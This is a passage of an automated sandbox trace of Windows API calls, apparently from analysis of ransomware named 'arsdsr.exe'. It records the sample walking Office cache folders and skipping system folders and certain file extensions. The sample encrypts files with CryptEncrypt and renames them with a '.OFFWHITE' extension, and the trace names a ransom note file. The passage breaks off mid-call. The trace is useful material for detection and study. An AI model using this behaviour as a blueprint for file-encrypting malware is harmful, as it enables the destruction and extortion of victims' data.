(lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.426] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.426] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0082.426] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.426] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.426] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0082.426] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.426] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.426] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0082.426] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.426] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.426] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0082.427] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x8f8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.427] SetLastError (dwErrCode=0x0) [0082.427] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0082.464] GetLastError () returned 0x0 [0082.464] GetLastError () returned 0x0 [0082.464] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x9f8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.464] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0082.465] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xaf8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.465] WriteFile (in: hFile=0x21c, lpBuffer=0x52bd40*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52bd40*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0082.465] GetProcessHeap () returned 0x500000 [0082.465] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8f8) returned 0x526640 [0082.465] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.465] ReadFile (in: hFile=0x21c, lpBuffer=0x526640, nNumberOfBytesToRead=0x8f8, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x526640*, lpNumberOfBytesRead=0x295e540*=0x8f8, lpOverlapped=0x0) returned 1 [0082.465] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.465] WriteFile (in: hFile=0x21c, lpBuffer=0x526640*, nNumberOfBytesToWrite=0x8f8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x526640*, lpNumberOfBytesWritten=0x295e54c*=0x8f8, lpOverlapped=0x0) returned 1 [0082.465] GetProcessHeap () returned 0x500000 [0082.465] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x526640 | out: hHeap=0x500000) returned 1 [0082.465] CloseHandle (hObject=0x21c) returned 1 [0082.466] GetProcessHeap () returned 0x500000 [0082.466] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0082.466] GetProcessHeap () returned 0x500000 [0082.466] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0082.467] GetProcessHeap () returned 0x500000 [0082.467] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0082.467] GetProcessHeap () returned 0x500000 [0082.467] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0082.467] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" [0082.467] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" [0082.467] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.offwhite")) returned 1 [0082.467] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x8f8, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0082.467] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0082.468] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="{90140000-0018-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~2")) returned 1 [0082.468] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0082.468] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0082.468] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="...") returned 1 [0082.468] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="windows") returned -1 [0082.468] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="$recycle.bin") returned 1 [0082.468] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="rsa") returned -1 [0082.468] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="ntuser.dat") returned -1 [0082.468] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="programdata") returned -1 [0082.468] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="appdata") returned -1 [0082.468] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="program files") returned -1 [0082.468] lstrcmpiW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="program files (x86)") returned -1 [0082.468] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/MSOCache\\All Users\\" | out: lpString1="C:/MSOCache\\All Users\\") returned="C:/MSOCache\\All Users\\" [0082.468] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\", lpString2="{90140000-0018-0409-1000-0000000FF1CE}-C" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C") returned="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C" [0082.468] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\" [0082.468] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\" [0082.468] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*") returned="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*" [0082.468] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0082.522] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.523] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe8729610, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xecdfa490, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0082.523] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.523] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.523] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe874f770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="PowerPointMUI.msi", cAlternateFileName="POWERP~1.MSI")) returned 1 [0082.523] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2=".") returned 1 [0082.523] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="..") returned 1 [0082.523] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="...") returned 1 [0082.523] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="windows") returned -1 [0082.523] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="$recycle.bin") returned 1 [0082.523] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="rsa") returned -1 [0082.523] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="ntuser.dat") returned 1 [0082.523] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="programdata") returned -1 [0082.523] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="appdata") returned 1 [0082.523] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="program files") returned -1 [0082.523] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="program files (x86)") returned -1 [0082.523] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\" [0082.523] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", lpString2="PowerPointMUI.msi" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" [0082.523] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.523] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.523] PathFindExtensionW (pszPath="PowerPointMUI.msi") returned=".msi" [0082.523] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0082.523] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0082.523] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0082.523] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0082.524] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0082.524] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0082.524] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0082.524] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0082.524] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0082.524] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0082.524] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0082.524] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0082.524] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0082.524] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0082.524] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0082.524] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="PowerPointMUI.xml", cAlternateFileName="POWERP~1.XML")) returned 1 [0082.524] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2=".") returned 1 [0082.524] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="..") returned 1 [0082.524] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="...") returned 1 [0082.524] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="windows") returned -1 [0082.524] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="$recycle.bin") returned 1 [0082.524] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="rsa") returned -1 [0082.524] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="ntuser.dat") returned 1 [0082.524] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="programdata") returned -1 [0082.524] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="appdata") returned 1 [0082.524] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="program files") returned -1 [0082.524] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="program files (x86)") returned -1 [0082.524] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\" [0082.524] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", lpString2="PowerPointMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" [0082.524] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.524] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.525] PathFindExtensionW (pszPath="PowerPointMUI.xml") returned=".xml" [0082.525] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0082.525] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0082.525] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0082.525] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0082.525] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0082.525] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0082.525] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0082.525] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0082.525] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0082.525] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0082.525] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0082.525] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0082.525] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0082.525] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0082.525] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0082.525] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0082.525] GetProcessHeap () returned 0x500000 [0082.525] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bb40 [0082.525] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0082.526] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1450) returned 1 [0082.526] GetProcessHeap () returned 0x500000 [0082.526] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0082.526] GetProcessHeap () returned 0x500000 [0082.526] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0082.526] GetProcessHeap () returned 0x500000 [0082.526] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0082.526] GetProcessHeap () returned 0x500000 [0082.526] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0082.526] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.526] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.526] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0082.526] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.526] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.526] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0082.526] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.526] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.526] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0082.527] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.527] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.527] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0082.527] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x5aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.527] SetLastError (dwErrCode=0x0) [0082.527] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0082.603] GetLastError () returned 0x0 [0082.603] GetLastError () returned 0x0 [0082.604] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x6aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.604] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0082.604] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x7aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.604] WriteFile (in: hFile=0x21c, lpBuffer=0x52bb40*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52bb40*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0082.604] GetProcessHeap () returned 0x500000 [0082.604] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5aa) returned 0x546980 [0082.604] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.604] ReadFile (in: hFile=0x21c, lpBuffer=0x546980, nNumberOfBytesToRead=0x5aa, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesRead=0x295e540*=0x5aa, lpOverlapped=0x0) returned 1 [0082.604] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.604] WriteFile (in: hFile=0x21c, lpBuffer=0x546980*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesWritten=0x295e54c*=0x5aa, lpOverlapped=0x0) returned 1 [0082.604] GetProcessHeap () returned 0x500000 [0082.604] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546980 | out: hHeap=0x500000) returned 1 [0082.605] CloseHandle (hObject=0x21c) returned 1 [0082.606] GetProcessHeap () returned 0x500000 [0082.606] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0082.606] GetProcessHeap () returned 0x500000 [0082.606] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0082.606] GetProcessHeap () returned 0x500000 [0082.606] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0082.606] GetProcessHeap () returned 0x500000 [0082.606] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0082.606] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" [0082.606] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.OFFWHITE" [0082.606] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.offwhite")) returned 1 [0082.607] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2d523500, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2d523500, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe8b079d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x431a290, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="PptLR.cab", cAlternateFileName="")) returned 1 [0082.607] lstrcmpiW (lpString1="PptLR.cab", lpString2=".") returned 1 [0082.607] lstrcmpiW (lpString1="PptLR.cab", lpString2="..") returned 1 [0082.607] lstrcmpiW (lpString1="PptLR.cab", lpString2="...") returned 1 [0082.607] lstrcmpiW (lpString1="PptLR.cab", lpString2="windows") returned -1 [0082.607] lstrcmpiW (lpString1="PptLR.cab", lpString2="$recycle.bin") returned 1 [0082.607] lstrcmpiW (lpString1="PptLR.cab", lpString2="rsa") returned -1 [0082.607] lstrcmpiW (lpString1="PptLR.cab", lpString2="ntuser.dat") returned 1 [0082.607] lstrcmpiW (lpString1="PptLR.cab", lpString2="programdata") returned -1 [0082.607] lstrcmpiW (lpString1="PptLR.cab", lpString2="appdata") returned 1 [0082.607] lstrcmpiW (lpString1="PptLR.cab", lpString2="program files") returned -1 [0082.607] lstrcmpiW (lpString1="PptLR.cab", lpString2="program files (x86)") returned -1 [0082.607] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\" [0082.608] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", lpString2="PptLR.cab" | out: lpString1="C:/MSOCache\\All 